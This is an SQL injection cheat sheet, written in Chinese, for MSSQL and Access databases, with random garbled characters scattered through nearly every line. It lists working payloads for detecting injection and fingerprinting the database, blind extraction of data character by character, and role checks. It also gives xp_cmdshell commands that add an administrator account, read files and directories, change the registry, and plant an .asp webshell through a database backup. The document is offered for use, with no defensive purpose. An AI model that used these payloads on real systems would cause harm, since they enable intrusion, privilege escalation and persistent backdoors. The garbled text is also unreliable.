1.判断是否有注入;and 1=1 ;and 1=2 @ym/2�7cRE
2.初步判断是否是mssql ;and user>0 p{P�E@KO�:
��)xb|3&+W
3.注入参数是字符'and [查询条件] and ''=' Q}S_%�I}u:
a_h]?5�
:c
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ""s]zN��F}
Y�?ez9o:/#
5.判断数据库系统 PMfkA�!.Y
Cg�z�D�$`~
;and (select count(*) from sysobjects)>0 mssql Q5%#^ZdsTd
CRbdAqo�fV
;and (select count(*) from msysobjects)>0 access �0flg��=U9
gK�OOHUCb�
&Q}*�+�Y]G
l��o'�W1�p
6.猜数据库 ;and (select Count(*) from [数据库名])>0 rp5(pV��7*
*�6 _�tQ9G
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ORu2V#��Z[
tDr#H!�2
3
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 [!�%!�[�E�
p�$ bn�K�]
9.(1)猜字段的ascii值(access) lY*[t�mz)�
5s�{ABJ\@V
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 iMfngIs �|
!?^b[
�nC%
(2)猜字段的ascii值(mssql) !~Q�2|���r
au�,t%8�AC
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �Agrp(i"\@
@��y�31NH(
10.测试权限结构(mssql) ���Tr^nkD{
QME�c�QV�>
�J<Pw+6B�~
z��"*/m�P2
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- r!,}Z=�cGe
h[Gg}�N!��
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- nN�X��g��W
N���25V��]
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- c^`�]`xi�X
m[k_>�e\�u
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 0�zY(��:;X
��U�\rh�[0
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- #lU9�y��v�
1,5E���`J
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- � ["�}�rk�
�JF/,�K"J
;and 1=(select IS_MEMBER('db_owner'));-- ![��f ![�l
J~(Wf%jM~
H~ u[3LQ�z
mw5�?�[@G-
11.添加mssql和系统的帐户 ^�*\XgX���
/pp1~r.s?>
;exec master.dbo.sp_addlogin username;-- ~��H6r.�:]
;exec master.dbo.sp_password null,username,password;-- UJs$q\#RO�
U.{l;EL�:T
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �<LRey%{�q
�4`�I�c&c/
;exec master.dbo.xp_cmdshell 'net user username password �Mc!�X�f�[
@�*
il3�h,
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- FYS/##���r
�0kDK�~iT�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- moV�bw`T��
�DQwGUF'(�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 5�Zw1y@�k(
L,;��D@X�i
��H�:H6�b�
-)vEWn$3<
12.(1)遍历目录 NzKUtwnIz�
|j3'eW�&�=
;create table dirs(paths varchar(100), id int) Vb
qto|X�@
�,7XtH�>2s
;insert dirs exec master.dbo.xp_dirtree 'c:\' �'Peni��1_
(��Z5##dS3
;and (select top 1 paths from dirs)>0 M/Pme��&�%
#.�[AK_S5&
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 5PcJZi^.l�
~XeF�OM��q
�<}6{{&mT4
R�llY-�JBO
(2)遍历目录 10�09ES7�*
7*DMV�ok:�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- n}xhW'3hU=
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �S(a�Z4{a@
PCn�Q_A�-Q
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 p�$7#��}�s
d3��^OE�we
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �1{_A:<VBl
/J�)l��/oI
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ��!se0F.K�
�V�DB;%U*D
^w�~�23g.�
BK��,s�c'b
13.mssql中的存储过程 S]�sk���7
�r3rx��C�&
xp_regenumvalues 注册表根键, 子键 �NrD�i����
x{�}z ;yG
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 (wmBjQ]B�<
�>MJ?g�-��
xp_regread 根键,子键,键值名 \n0Oez0z!B
G1�� o7��0
;exec xp_regread �*]�J��dHO
hl&�-\�dc+
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 AGA�`�fRVx
)x�#5Il
�H
xp_regwrite 根键,子键, 值名, 值类型, 值 ECa�$vvK
m
a'\By�?V]
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 nxQ?bk}*d�
#��sK��Wd�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��1r r@���
�"x���'�),
xp_regdeletevalue 根键,子键,值名 +&��KQ28r�
�S~$'�W�A�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 HEqW�oV]{d
PZ�8�U6K'�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 7:�=5"ScV
k�&hc� �m�
\�F,�DA"K_
!\[�+9�9F#
14.mssql的backup创建webshell O gmO�&cE
~fz�[x�9�\
use model �RAN�Pi\]�
U3v�Edw<lV
create table cmd(str image); q&'Lbxc>c
(B>�Zaro#�
insert into cmd(str) values (''); E�&
�36��H
o?Sla_D �
backup database model to disk='c:\l.asp'; TY;U2.Ud�
D �7shiv|,
/7$mxtB5%L
�V9�x���8R
15.mssql内置函数 2^e��xL� h
|c�-L�Ss'\
;and (select @@version)>0 获得Windows的版本号 *.y'��(tj[
�IN^�9uL]B
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
y�eD_�j/
_����J?SIm
;and (select user_name())>0 爆当前系统的连接用户 ��71B�3�a�
yt�.c5>�B^
;and (select db_name())>0 得到当前连接的数据库 ��e/e0d<(1
X=qS"�O� 1
^[h�2%�c$�
VlW�9UF�-W
16.简洁的webshell ]>:^d%n,�}
Z$K+�
7>^
use model `rWB`q|i<
�!"4w&��bQ
create table cmd(str image); ` DCU>bt&R
�GCE!��$W
insert into cmd(str) values (''); AfWl6a?T8:
�_^u�c 0=�
backup database model to disk='g:\wwwtest\l.asp';
